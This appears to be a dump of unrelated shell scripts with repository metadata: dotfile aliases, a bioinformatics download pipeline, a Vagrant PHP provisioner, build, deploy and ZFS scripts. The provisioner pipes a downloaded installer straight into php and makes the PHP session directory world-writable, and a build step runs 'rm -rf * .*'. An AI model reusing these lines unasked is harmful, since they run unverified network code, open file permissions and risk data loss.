echo 'if [[ $MY_NVIM_BG == "light" ]];then export MY_NVIM_BG="dark"; alias colorls="colorls"; export BAT_THEME="gruvbox (Dark) (Hard)"; fi' > ~/.config/kitty/custom_zsh_source
fi
fi
echo -n "get_theme\n" | kitty @ send-text -t="title:subhaditya@$(cat /proc/sys/kernel/hostname)" --stdin
} # }}}
alias to=toggle_theme
alias telebit=~/telebit
telebit_share_cur_dir () {
trap 'echo; echo Stopping telebit; telebit disable' INT
echo "https://wicked-emu-8.telebit.io/" | clipcopy
if [[ -z $* ]]
then
telebit http ./.
else
telebit http $*
fi
telebit enable
while sleep 1; do echo -n ''; done
}
alias telebit_share=telebit_share_cur_dir
alias py=python
export PYTHONSTARTUP=~/.pythonrc
alias g=git
alias ga='git add'
alias gaa='git add --all'
alias gaav='git add --all --verbose'
alias gc='git commit -v'
alias gca='git commit -v -a'
alias gp='git push'
alias gcm=
# alias gcma=
my_gcm () { git commit -m "$*" }
# my_gcma () { git commit --amend -m "$*" }
alias gcm=my_gcm
# alias gcma=my_gcma
alias gpull="git pull"
alias cal3="cal -3"
alias n=nvim
if [[ $TERM =~ 'kitty' ]]; then alias icat="kitty +kitten icat"; fi
alias qr="qrencode -t UTF8"
alias nvimvenv="source ~/.config/nvim/venv/bin/activate"
alias nvimdiff="nvim -d"
alias theme_light="gsettings set org.gnome.desktop.interface gtk-theme Layan-light && gsettings set org.gnome.desktop.interface icon-theme Tela-blue"
alias theme_dark="gsettings set org.gnome.desktop.interface gtk-theme Layan-dark && gsettings set org.gnome.desktop.interface icon-theme Tela-blue-dark"
# See https://sw.kovidgoyal.net/kitty/faq.html#i-get-errors-about-the-terminal-being-unknown-or-opening-the-terminal-failing-when-sshing-into-a-different-computer
if [[ $TERM =~ 'kitty' ]]; then
function my_ssh () {
if kitty +kitten ssh $* || ssh $*
then unalias ssh
fi
}
alias ssh-kitty=my_ssh
alias ssh_kitty=my_ssh
alias kitty-ssh=my_ssh
alias kitty_ssh=my_ssh
fi
alias sql_start="systemctl start mariadb"
alias sql_stop="systemctl stop mariadb"
alias init.vim="nvim ~/.config/nvim/init.vim"
alias bspwmrc="nvim ~/.config/bspwm/bspwmrc"
alias sxhkdrc="nvim ~/.config/sxhkd/sxhkdrc"
alias zshrc="nvim ~/.zshrc"
alias wifi="nmcli dev wifi list"
alias shrug="echo -n '¯\_(ツ)_/¯' | clipcopy"
alias copy=clipcopy
alias picom_restart="killall picom; sleep 0.5 && sh -c 'picom &'"
alias lock="i3lock -c 00000040 -k --pass-media-keys --pass-screen-keys --radius 180 --ring-width 20 --linecolor 00000000 --ringcolor=ffffff --keyhlcolor=000000 --insidecolor=ffffff --indicator --ringwrongcolor ff2134 --separatorcolor 00000000 --ringvercolor 008cf7 --insidevercolor 008cf7 --insidewrongcolor ff2134 --pass-power-keys --refresh-rate=0.5 --bshlcolor=ff2134 --datestr='%A, %d %b %Y' --redraw-thread &> /dev/null"
alias winvm_1cpu="bspc desktop --layout monocle; VBoxManage modifyvm Win10 --cpus 1 && exec VBoxManage startvm Win10"
alias winvm_2cpu="bspc desktop --layout monocle; VBoxManage modifyvm Win10 --cpus 2 && exec VBoxManage startvm Win10"
alias winvm_4cpu="bspc desktop --layout monocle; VBoxManage modifyvm Win10 --cpus 4 && exec VBoxManage startvm Win10"
bspwm_delete_monitor() { #{{{
local monitor
local desktop
for monitor in "$@"
do
for desktop in $(bspc query -D -m "$monitor")
do
bspc desktop "$desktop".occupied --to-monitor focused
done
bspc monitor "$monitor" --remove
done
}
_bspwm_delete_monitor() { compadd $(bspc query -M -m .!focused --names) }
compdef _bspwm_delete_monitor bspwm_delete_monitor #}}}
usb() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
PATH=$PATH_SAVED
for _ in $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="disk"' | cut -d' ' -f1)
do
eval $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="disk"' | cut -d' ' -f1)
$lsblk $PATH -t -o NAME,SIZE,TYPE,LABEL,MOUNTPOINT
PATH=$PATH_SAVED
done
}
usb_mount() { #{{{
udisksctl mount -b "$@"
echo
usb
}
_usb_mount_completion() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
local to_eval
PATH=$PATH_SAVED
for to_eval in $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="part"' | cut -d' ' -f1)
do
eval $to_eval
compadd $PATH
done
PATH=$PATH_SAVED
}
compdef _usb_mount_completion usb_mount #}}}
usb_unmount() { #{{{
udisksctl unmount -b "$@"
echo
usb
}
_usb_unmount_completion() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
local to_eval
PATH=$PATH_SAVED
for to_eval in $(lsblk -P -o PATH,RM,TYPE,MOUNTPOINT | grep 'RM="1"' | grep 'TYPE="part"' | grep -v 'MOUNTPOINT=""' | cut -d' ' -f1)
do
eval $to_eval
compadd $PATH
done
PATH=$PATH_SAVED
}
compdef _usb_unmount_completion usb_unmount #}}}
usb_poweroff() { #{{{
udisksctl power-off -b "$@"
echo
usb
}
_usb_poweroff_completion() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
local to_eval
PATH=$PATH_SAVED
for to_eval in $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="disk"' | cut -d' ' -f1)
do
eval $to_eval
compadd $PATH
done
PATH=$PATH_SAVED
}
compdef _usb_poweroff_completion usb_poweroff #}}}
alias usbmount=usb_mount
alias usbunmount=usb_unmount
alias usbpoweroff=usb_poweroff
compdef usbmount=usb_mount
compdef usbunmount=usb_unmount
compdef usbpoweroff=usb_poweroff
_udisksctl_completion() { # {{{
local suggestions=$(udisksctl complete "${COMP_LINE}" ${COMP_POINT})
COMPREPLY=($(compgen -W "$suggestions" -- ""))
}
autoload -U bashcompinit
complete -o nospace -F _udisksctl_completion udisksctl
# }}}
| true
|
5834ba5786f794f33fee8446ba540131d2f4d75f
|
Shell
|
gzahn/tools
|
/SRA_Download_and_Process.sh
|
UTF-8
| 4,640
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/sh
############################
#SRA online search terms:
#ITS1
#
#SRA online filters:
#Platform = Illumina
############################
# This script takes the standard downloads from the SRA read selector (the table and accession list) and uses them to download all the associated fastq files from the Sequence Read Archive.
# It then filters for read quality (default 95% of bases with at least a 25 phred score) removes empty reads and reverse reads, converts to fasta files and makes a valid QIIME mapping file based on the sample names.
# Next, it constructs one BIG fasta file, ready for OTU picking or other pre-processing steps.
#This script assumes the following: 1. you have SRATools installed on your machine. Make sure to check the verison and location and adjust line 29
# 2. You have downloaded a table and list of accession numbers from the SRA read selector website. Table contains metadata for each accession.
# 3. You have QIIME and the fastx_toolkit installed and in your $PATH
# usage: bash SRA_Download_and_Process.sh /PATH/TO/SRA_RUN_TABLE.TXT /PATH/TO/SRA_ACCESSION_LIST.TXT /OUTPUT/DIRECTORY/PATH/FOR/READS_AND_MAPPING_FILES
# Determine total disk size of downloads based on metadata table (field 16) (this may not be robust...fix to use column name "Mbytes")
cut -f 16 $1 > file_sizes
paste <(awk '{sum += $1} END {print sum}' file_sizes) <(echo "Mbytes Total... Downloads will start in 10 seconds.")
#pause to sink in, give time to cancel
sleep 10
echo "Downloading fastq files associated with SRA accession numbers..."
# use SRA toolkit fastq-dump to download fastq files for each associated SRA accession (Fwd and Rev runs in separate reads, gzip compression, no technical reads)
cat $2 | xargs ~/sratoolkit.2.8.1-2-ubuntu64/bin/fastq-dump --split-files --bzip2 --skip-technical --readids --dumpbase --outdir $3
echo "Removing reverse reads...screw 'em!"
#deal with reverse reads....probably just dump them, at least until I can incorporate PEAR matching. Probably not worth it though.
rm *_2.fastq.bz2
echo "Unzipping fastq files..."
#unzip fastqs
bzip2 -d *.bz2
echo "Filtering fastqs to remove low-quality reads..."
#quality filter fastq (min 95% bases with 25 phred score)
for fn in *.fastq; do fastq_quality_filter -i $fn -q 25 -p 95 -o $fn.QC_25-95 -v >> QC-25-95.out; done
echo "Converting fastq to fasta..."
#convert to fasta
for fn in *.QC_25-95; do convert_fastaqual_fastq.py -f $fn -c fastq_to_fastaqual -F; done
echo "Removing empty files..."
#remove empty fasta files
find . -type f -empty -exec rm {} \;
echo "Making list of file names..."
#make list of filenames
ls -1 *.fna > filenames
###make lists of sampleIDs/barcodes/linkerprimers/descriptions
echo "Making mapping file for QIIME..."
#make list of valid (non-empty) samples to build mapping file for QIIME
cut -d "_" -f1 filenames > valid_sampleIDs
#count number of valid samples and assign to variable
count="$(wc -l valid_sampleIDs | cut -d " " -f 1)"
#make unique descriptions using number of valid samples
paste -d "_" valid_sampleIDs <(echo $(yes SRAExp | head -n$count) | tr " " "\n") > valid_descriptions
#make bogus barcodes and primers using number of valid samples
echo $(yes ACGTACGTACGT | head -n$count) | tr " " "\n" > valid_barcodes
echo $(yes TAGATAG | head -n$count) | tr " " "\n" > valid_linkers
#add header labels to mapping file
paste <(echo -e "#SampleID\tBarcodeSequence\tLinkerPrimerSequence\tInputFileName") <(head -1 $1) <(echo "Description") >> mapping_file.tsv
#construct mapping file
paste valid_sampleIDs valid_barcodes valid_linkers <(while read line; do paste <(grep $line filenames) <(grep $line $1) <(grep $line valid_descriptions); done < valid_sampleIDs) >> mapping_file.tsv
echo "Cleaning up intermediate files..."
#remove qual scores
rm *.qual
#package up fastqs and fastas
mkdir ./Fastqs
mkdir ./Fastqs/Raw
zip QC_fastqs *.QC_25-95
rm *.QC_25-95
zip Raw_fastqs *.fastq
mv Raw_fastqs.zip ./Fastqs
mv QC_fastqs.zip ./Fastqs
mv *.fastq ./Fastqs/Raw
gzip ./Fastqs/Raw/*.fastq
mv QC-25-95.out ./Fastqs
echo "Creating main fasta file, indexed for QIIME..."
add_qiime_labels.py -i ./ -m ./mapping_file.tsv -c InputFileName
echo "Validating mapping file..."
validate_mapping_file.py -m mapping_file.tsv
sleep 3
rm mapping_file.tsv.html mapping_file.tsv.log overlib.js
mkdir Intermed_files
mv valid* file* Intermed_files
mkdir ./Fastas
mv *.fastq.fna ./Fastas
zip QC_Fastas ./Fastas/*.fna
echo -e "Process complete.\nReady for OTU-Picking.\n\nIf errors were raised in mapping file validation, use the corrected mapping file in QIIME."
| true
|
1dbefbec2de69baa26d6cd3d0cf8165a00fd47f4
|
Shell
|
yksi/Restaurant-Application
|
/data/deploy/development/provision.sh
|
UTF-8
| 1,606
| 2.734375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#Update centos
sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
sudo rpm -Uvh https://mirror.webtatic.com/yum/el6/latest.rpm
sudo yum -y update
#Install tools
sudo yum install -y tar bzip2 git zip unzip
#Install configs
sudo cp -Rf /vagrant/soft-group-test/data/deploy/development/etc/* /etc/
echo export APPLICATION_ENV="development" >> /etc/bashrc
#Install httpd
sudo yum install -y httpd
sudo service httpd start
sudo chkconfig httpd on
#Install mariaDB
sudo yum install -y MariaDB-server MariaDB-client
sudo service mysql start
sudo chkconfig mysql on
#Install PHP
sudo yum install -y php70w php70w-opcache
sudo yum install -y php70w-pear php70w-devel php70w-pdo php70w-pecl-redis php70w-bcmath \
php70w-dom php70w-eaccelerator php70w-gd php70w-imap php70w-intl php70w-mbstring \
php70w-mcrypt php70w-mysqlnd php70w-posix php70w-soap php70w-tidy php70w-xmlrpc \
php70w-pecl-xdebug php70w-zip
sudo chmod 777 -R /var/lib/php/session
#Install code analyser
sudo pear install PHP_CodeSniffer
wget http://static.phpmd.org/php/latest/phpmd.phar
sudo mv phpmd.phar /usr/bin/phpmd
sudo chmod +x /usr/bin/phpmd
#Restart services
sudo service httpd restart
sudo service mysql restart
sudo service redis restart
#Install composer
curl -sS https://getcomposer.org/installer | php
mv composer.phar /usr/local/bin/composer
#Install project
mysql -u root -e "DROP DATABASE IF EXISTS development; CREATE DATABASE development;";
cd /vagrant/soft-group-test; php /usr/local/bin/composer install
| true
|
1a100e7645e8257f608c4c6c1bdb80909bf9d44b
|
Shell
|
CGS-Purdue/record-the-earth-app
|
/App/.bin/_ts
|
UTF-8
| 1,098
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# EXPO HELPER
# -------------
BASE_DIR="$(npm prefix)"
source ${BASE_DIR}/../.env
# tsc --removeComments --module ESNext --target ESNEXT --pretty
# ts build --removeComments --jsx react-native --module ESNext --target ESNEXT --pretty --declaration **/*.ts **/*.tsx
#!/bin/bash
BASE_DIR="$(npm prefix)"
source ${BASE_DIR}/../.env
if [ "$RUN_TYPE_NOC" == "yes" ]; then
# --------------------------------- #
# USE REGULAR TS BY SETTING --NO-C #
# --------------------------------- #
$BASE_PATH/./node_modules/.bin/ts \
build \
--removeComments \
--jsx react-native \
--module ESNext \
--target ESNEXT \
--pretty \
--declaration \
**/*.ts \
**/*.tsx \
"$@"
else
# -------------------------------- #
# USES TSC BY DEFAULT #
# -------------------------------- #
$BASE_PATH/./node_modules/.bin/tsc \
--removeComments \
--module ESNext \
--target ESNEXT \
--skipLibCheck \
--stripInternal \
--pretty \
"$@"
fi
| true
|
67053c37bb25c684a23bc64f05cb0559c47ea908
|
Shell
|
s333770/LinuxTesting
|
/Operativsystemer/omDegScript.sh
|
UTF-8
| 295
| 2.796875
| 3
|
[] |
no_license
|
#! /bin/bash
echo "Ditt brukernavn er ${USER}"
echo "Prosessen du kjører er $$"
echo "Operativsystemet er `uname`"
echo "Din hjemmekatalog: ${HOME}"
filer=ls /home/andreas/ | wc -l
#kataloger= ls -ld */ | wc -l
echo "Antall filer i hjemmekatalog: $filer"
#echo "Antall kataloger: $kataloger"
| true
|
b41d6d2b9a0276f450bb04a63bfb243fc31b68fe
|
Shell
|
fxha/dotfiles
|
/.bash_logout
|
UTF-8
| 356
| 2.890625
| 3
|
[
"MIT"
] |
permissive
|
# ~/.bash_logout
# when leaving the console clear the screen to increase privacy
if [ "$SHLVL" = 1 ]; then
[ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi
# kill ssh agent
if [ -n "$SSH_AGENT_PID" ]; then
eval `/usr/bin/ssh-agent -k`
fi
# load local configuration
if [ -f ~/.bash_logout.local ]; then
. ~/.bash_logout.local
fi
| true
|
117cc42210b011a5f6d95e45b2003813cadc93fe
|
Shell
|
Leonardrae/scripts
|
/sec3-exec2.sh
|
UTF-8
| 270
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
[ -f "$1" ] && echo "File ${1} is a file, script will exit with code 0" && exit 0
[ -d "$1" ] && echo "File ${1} is a directory, script will exit with code 1" && exit 1
[ -a "$1" ] || echo "File ${1} Does Not Exist, script will exit with code 2" && exit 2
| true
|
0351721f123179a6c1073ce011b5e5507770f414
|
Shell
|
shone2567/work
|
/phase1/koji/sub_zpool_destroy.sh
|
UTF-8
| 532
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
sub_zpool_destroy(){
local zfs_rcache_postfix="*\.vcache"
local zfs_vdisk_dir="$HOME/temp/zfs/vdisks"
local zfs_vlog_dir="$HOME/temp/zfs/vlogs"
local zfs_vcache_dir="$HOME/temp/zfs/vcaches"
local zpool="pool1"
sudo zpool destroy $zpool
sudo zpool list
sudo zpool status
#remove all vdisks and vdevices
rm -r $zfs_vdisk_dir
rm -r $zfs_vlog_dir
rm -r $zfs_vcache_dir
#clean up the loop device
sudo losetup | grep -E "$zfs_rcache_postfix" | cut -d " " -f 1 | xargs sudo losetup -d
}
sub_zpool_destroy
| true
|
875f01052eb459f2ff6d96365376aa62385699eb
|
Shell
|
neeltuk/High-Dimensional-Model-Explanations-An-Axiomatic-Approach
|
/code/script_for_BERT_predictions.sh
|
UTF-8
| 723
| 2.515625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
BERT_BASE_DIR='/data/checkpoints/uncased_L-24_H-1024_A-16'
DATASETS="$HOME/.data/glue_data"
DATASETS='../../../Data/imdb'
tensorboard --logdir data/outputs &
for NUMBER in {1001..2000..4}
do
echo $NUMBER
python run_classifier.py \
--task_name=IMDB \
--do_train=false \
--do_eval=false \
--do_predict=true \
--data_dir=$DATASETS/$NUMBER \
--vocab_file=$BERT_BASE_DIR/vocab.txt \
--bert_config_file=$BERT_BASE_DIR/bert_config.json \
--init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \
--max_seq_length=128 \
--train_batch_size=32 \
--learning_rate=2e-5 \
--num_train_epochs=3 \
--output_dir=data/outputs/$NUMBER \
--model_dir=data/outputs/imdb \
--gpu_number=4 \
$@
done
| true
|
689dd56ed7c63c856567209c821a85b0310d2cc0
|
Shell
|
xxtbg/coredroidservice
|
/CoreDroid/build
|
UTF-8
| 583
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/sh
echo "BUILD: setting env variables"
ROOT_PATH=`pwd`
OUT_PATH="$ROOT_PATH/out"
MONO_PATH="$ROOT_PATH/mono-2.10.9"
export CC="gcc"
export CXX="g++"
export LD="ld"
export CFLAGS=""
export CXXFLAGS="$CFLAGS"
export LDFLAGS=""
cd $MONO_PATH
./configure --prefix=$OUT_PATH --exec-prefix=$OUT_PATH --disable-mcs-build #--with-tls=pthread #--enable-static --disable-shared --with-static_mono=yes --with-shared_mono=no
echo "#define ARM_FPU_NONE 1" >> config.h
echo "press enter to continue"
read TMP
make LDFLAGS="$LDFLAGS -all-static -pthread -lm -lrt -ldl" && make install
| true
|
e2c4f12807405848c0b080d6b24f66452d9589ab
|
Shell
|
liuyiyang123/zgit_shadow
|
/tools/zmaster_init_self.sh
|
UTF-8
| 4,148
| 3.140625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# 预环境要求:
# (1) /etc/ssh/sshd_config 中的 MaxStartups 参数指定为 1024 以上
# (2) /etc/sysctl.conf 中的 net.core.somaxconn 参数指定为 1024 以上,之后执行 sysctl -p 使之立即生效
# (3) yum install openssl-devel
# 布署系统全局共用变量
export zGitShadowPath=${HOME}/zgit_shadow2
zServAddr=$1
zServPort=$2
zShadowPath=$zGitShadowPath # 系统全局变量 $zGitShadowPath
cd $zShadowPath
#git stash
#git pull # 有时候不希望更新到最新代码
eval sed -i 's%__MASTER_ADDR%${zServAddr}%g' ./tools/post-update
eval sed -i 's%__MASTER_PORT%${zServPort}%g' ./tools/post-update
eval sed -i 's%__MASTER_ADDR%${zServAddr}%g' ./tools/zhost_self_deploy.sh
eval sed -i 's%__MASTER_PORT%${zServPort}%g' ./tools/zhost_self_deploy.sh
kill -9 `ps ax -o pid,cmd | grep -v 'grep' | grep -oP "\d+(?=\s+\w*\s*${zShadowPath}/tools/zauto_restart.sh)"`
kill -9 `ps ax -o pid,cmd | grep -v 'grep' | grep -oP "\d+(?=\s+${zShadowPath}/bin/git_shadow)"`
mkdir -p ${zShadowPath}/bin
mkdir -p ${zShadowPath}/log
mkdir -p ${zShadowPath}/conf
touch ${zShadowPath}/conf/master.conf
rm -rf ${zShadowPath}/bin/*
# build libpcre2
# wget https://ftp.pcre.org/pub/pcre/pcre2-10.23.tar.gz
# mkdir ${zShadowPath}/lib/libpcre2_source/____build
# if [[ 0 -eq $? ]]; then
# cd ${zShadowPath}/lib/libpcre2_source/____build && rm -rf * .*
# cmake .. \
# -DCMAKE_INSTALL_PREFIX=${zShadowPath}/lib/libpcre2 \
# -DBUILD_SHARED_LIBS=ON \
# -DPCRE2_BUILD_PCRE2GREP=OFF \
# -DPCRE2_BUILD_TESTS=OFF
# cmake --build . --target install
# fi
# zLibPcrePath=${zShadowPath}/lib/libpcre2/lib64
# if [[ 0 -eq `ls ${zLibPcrePath} | wc -l` ]]; then zLibPcrePath=${zShadowPath}/lib/libpcre2/lib; fi
# build libssh2
mkdir ${zShadowPath}/lib/libssh2_source/____build
if [[ 0 -eq $? ]]; then
cd ${zShadowPath}/lib/libssh2_source/____build && rm -rf * .*
cmake .. \
-DCMAKE_INSTALL_PREFIX=${zShadowPath}/lib/libssh2 \
-DBUILD_SHARED_LIBS=ON
cmake --build . --target install
fi
zLibSshPath=${zShadowPath}/lib/libssh2/lib64
if [[ 0 -eq `ls ${zLibSshPath} | wc -l` ]]; then zLibSshPath=${zShadowPath}/lib/libssh2/lib; fi
# build libgit2
mkdir ${zShadowPath}/lib/libgit2_source/____build
if [[ 0 -eq $? ]]; then
cd ${zShadowPath}/lib/libgit2_source/____build && rm -rf * .*
cmake .. \
-DCMAKE_INSTALL_PREFIX=${zShadowPath}/lib/libgit2 \
-DLIBSSH2_INCLUDEDIR=${zShadowPath}/lib/libssh2/include \
-DLIBSSH2_LIBDIR=`dirname ${zLibSshPath}` \
-DBUILD_SHARED_LIBS=ON \
-DBUILD_CLAR=OFF
cmake --build . --target install
fi
zLibGitPath=${zShadowPath}/lib/libgit2/lib64
if [[ 0 -eq `ls ${zLibGitPath} | wc -l` ]]; then zLibGitPath=${zShadowPath}/lib/libgit2/lib; fi
# 编译主程序,静态库文件路径一定要放在源文件之后,如查使用静态库,则必须在此之前链接 zlib curl openssl crypto (-lz -lcurl -lssl -lcrypto)
###############################################
# -I${zShadowPath}/lib/libpcre2/include \
# -L${zLibPcrePath} \
# -lpcre2-8 \
###############################################
clang -Wall -Wextra -std=c99 -O2 -lpthread \
-I${zShadowPath}/inc \
-I${zShadowPath}/lib/libssh2/include \
-L${zLibSshPath} \
-lssh2 \
-I${zShadowPath}/lib/libgit2/include \
-L${zLibGitPath} \
-lgit2 \
-o ${zShadowPath}/bin/git_shadow \
${zShadowPath}/src/zmain.c \
${zShadowPath}/src/run/*.c
strip ${zShadowPath}/bin/git_shadow
# 编译 notice 程序,用于通知主程序有新的提交记录诞生
clang -Wall -Wextra -std=c99 -O2 \
-I${zShadowPath}/inc \
-o ${zShadowPath}/tools/notice \
${zShadowPath}/src/zExtraUtils/znotice.c
strip ${zShadowPath}/tools/notice
export LD_LIBRARY_PATH=${zShadowPath}/lib/libssh2/lib64:${zShadowPath}/lib/libgit2/lib:$LD_LIBRARY_PATH
${zShadowPath}/bin/git_shadow -f ${zShadowPath}/conf/master.conf -h $zServAddr -p $zServPort >>${zShadowPath}/log/ops.log 2>>${zShadowPath}/log/err.log
# 后台进入退出重启机制
# ${zShadowPath}/tools/zauto_restart.sh $zServAddr $zServPort &
| true
|
5f29b98d54207075a3ffa9cdf10dc00f2922c21b
|
Shell
|
deadcrew/deadfiles
|
/bin/wait-key
|
UTF-8
| 298
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
key="${1}"
if [[ ! -e /tmp/waitkey ]]; then
mkfifo /tmp/waitkey
fi
keypresses >/tmp/waitkey &
pid=$!
while read -a chunks; do
if [[ "${chunks[0]}" == "KeyRelease" && "${chunks[2]}" == "[$key]" ]]; then
break
fi
done </tmp/waitkey
kill $(ps -o pid= --ppid $pid)
| true
|
f1d09dabe6e72ee069477fa569c46c307239dd09
|
Shell
|
fabianlee/microk8s-nginx-istio
|
/tf-libvirt/create-snapshot.sh
|
UTF-8
| 656
| 3.046875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
thedomain="microk8s-1-192.168.122.210"
thedisk="microk8s-1"
snapshotname="initial"
targetdisk="vda"
# look at '<disk>' types, can have type other than file
virsh dumpxml $thedomain | grep '<disk' -A5
# show block level devices
virsh domblklist $thedomain
# pull default pool path from xml
pooldir=$(virsh pool-dumpxml default | grep -Po "(?<=path\>)[^<]+")
echo "default pool dir: $pooldir"
# create snapshot in default pool location
set -ex
virsh snapshot-create-as $thedomain --name $snapshotname --disk-only --diskspec vda,file=$pooldir/$thedisk.$snapshotname --diskspec hdd,snapshot=no
# list snapshot
virsh snapshot-list $thedomain
| true
|
ac30d8eb73ca7134f3c309daba6dc0bb1ef691cc
|
Shell
|
Dilhasha/AppFacCLI
|
/execute/build-all
|
UTF-8
| 532
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
set -x
OUTDIR=$(dirname $0)/../outNw
GOARCH=amd64 GOOS=windows $(dirname $0)/build && cp $OUTDIR/appfac $OUTDIR/appfac-windows-amd64.exe
GOARCH=386 GOOS=windows $(dirname $0)/build && cp $OUTDIR/appfac $OUTDIR/appfac-windows-386.exe
GOARCH=amd64 GOOS=linux $(dirname $0)/build && cp $OUTDIR/appfac $OUTDIR/appfac-linux-amd64
GOARCH=386 GOOS=linux $(dirname $0)/build && cp $OUTDIR/appfac $OUTDIR/appfac-linux-386
GOARCH=amd64 GOOS=darwin $(dirname $0)/build && cp $OUTDIR/appfac $OUTDIR/appfac-darwin-amd64
| true
|
aeb5d5620484ebd15482b1ad243c475d3c5cc97a
|
Shell
|
firstandthird/continuous
|
/scripts/push/default
|
UTF-8
| 1,098
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
#build repo
BUILDER="firstandthird/builder:0.0.7"
docker pull $BUILDER > /dev/null 2>&1
IMAGE=$(docker run \
--rm \
-e USER=$GITHUB_USER \
-e REPO=$GITHUB_REPO \
-e BRANCH=$GITHUB_BRANCH \
-e TOKEN=$GITHUB_TOKEN \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /repos:/repos \
${BUILDER})
if [[ "$?" != 0 ]]; then
echo "there was an error building"
post2slack --tags error --message "$GITHUB_REPO#$GITHUB_BRANCH failed to build $IMAGE"
exit 1
fi
echo "$IMAGE built"
NAME=$(bash /scripts/lib/get-container-name)
docker inspect $NAME > /dev/null 2>&1
if [[ "$?" == 0 ]]; then
echo "$NAME exists, removing first"
docker stop $NAME
docker rm $NAME
fi
HOST=$(bash /scripts/lib/get-virtual-host)
docker run -d \
--name $NAME \
--env VIRTUAL_HOST=$HOST \
--env NODE_ENV=$APP_NODE_ENV \
$IMAGE
if [[ "$?" != 0 ]]; then
echo "error running $NAME"
post2slack --tags error --message "error starting $GITHUB_REPO#$GITHUB_BRANCH"
fi
echo "$NAME deployed to $HOST"
post2slack --tags success --message "$GITHUB_REPO#$GITHUB_BRANCH deployed to $HOST"
| true
|
07d5a751be0967fb02ca12b50a4982d65f289878
|
Shell
|
fontes99/ORM-Cloud-project
|
/install.sh
|
UTF-8
| 213
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
mkdir -p keys
chmod +x task-list-template
sed -e "s|path_to_pedro|$(pwd)|g" task-list-template > task-list
chmod +x task-list
sudo mv task-list /usr/bin/
python3 main.py
echo 'INSTALL completed'
| true
|
60a74d52002758e215828782637cd36eca92c807
|
Shell
|
elsayed-lab/gene-structure-analysis
|
/scripts/lmajor_friedlin/S01_count_total_reads.sh
|
UTF-8
| 537
| 3.421875
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#
# Counts the total number of reads uses as input for gene structure analysis.
#
outfile="../../input/lmajor_hsapiens/S01_num_reads_total.csv"
echo "sample_id,num_reads_total" > $outfile
for x in $SCRATCH/utr_analysis/lmajor-infecting-hsapiens-*/input/HPGL*/processed/*R1*.gz; do
sample_id=$(echo $x | egrep -o "HPGL[0-9]+" | head -1)
num_reads_r1=$(( $(zcat $x | wc -l) / 4 ))
num_reads_r2=$(( $(zcat ${x/R1/R2} | wc -l) / 4 ))
printf "%s,%d\n" $sample_id $(($num_reads_r1 + $num_reads_r2)) >> $outfile
done
| true
|
fb9292d8d0a950bc099b931c5cc2f1a65b6a8cd8
|
Shell
|
oxfordcontrol/osqp-wheels
|
/config.sh
|
UTF-8
| 1,310
| 3.21875
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Define custom utilities
# Test for OSX with [ -n "$IS_OSX" ]
TESTS_DIR="$(pwd)/osqp-python"
function fix_cmake {
if [ -n "$IS_OSX" ]; then
brew update
brew upgrade cmake || brew install cmake
else
# Fix cmake installation linking the appropriate binary
pip install cmake
rm `python -c 'import sys; print(sys.executable[:-6])'`cmake
CMAKE_BIN=`python -c "from distutils.sysconfig import get_python_lib; print(get_python_lib())"`/cmake/data/bin/cmake
ln -sf ${CMAKE_BIN} /usr/local/bin/cmake
fi
}
function pre_build {
# Any stuff that you need to do before you start building the wheels
# Runs in the root directory of this repository.
# Fix cmake installation linking the appropriate binary
fix_cmake
}
function run_tests {
# Fix cmake installation linking the appropriate binary
fix_cmake
# Create source distribution and put into wheelhouse
if [ -z "$IS_OSX" ] && [ "$MB_PYTHON_VERSION" == "3.6" ]; then
cd ${TESTS_DIR}; python setup.py sdist --dist-dir /io/wheelhouse/;
echo "Created source distribution in /io/wheelhouse"
fi
# Runs tests on installed distribution from an empty directory
python --version
# python -c 'import sys; import yourpackage; sys.exit(yourpackage.test())'
cd ${TESTS_DIR}; python -m pytest -k 'not mkl_'
}
| true
|
a62aeba6ef025b05e6562f3bd4d476730c0da4d8
|
Shell
|
ondras12345/CNC
|
/pcb2gcode/generate
|
UTF-8
| 1,622
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
cat <<EOF
# Copy this file to your gerber directory and name it \`millproject\`
# See \`man pcb2gcode\`
# Set paths to gbr files
back=
drill=
outline=
$(
if [ -n "$DOUBLE_SIDED" ] ; then
cat <<EOF2
front=
# Alignment pins
# You need to decide where to drill alignment holes.
# For example, you can put them in the middle of the board.
mirror-axis=0mm
EOF2
fi
)
# Machine settings
metric=true
metricoutput=true
zsafe=2
spinup-time=1
zchange=10
# zchange-absolute interacts badly with bCNC autolevel.
#zchange-absolute=true
g0-vertical-speed=500
g0-horizontal-speed=800
nog81=true
# Keep M6 and handle in bCNC
#nom6=true
nog64=true
# Optimization
# TODO
#optimise=?
#path-finding-limit=?
# Milling
mill-diameters=1.0mm,0.39mm
mill-feed=200
mill-vertfeed=80
mill-speed=10000
zwork=-0.12
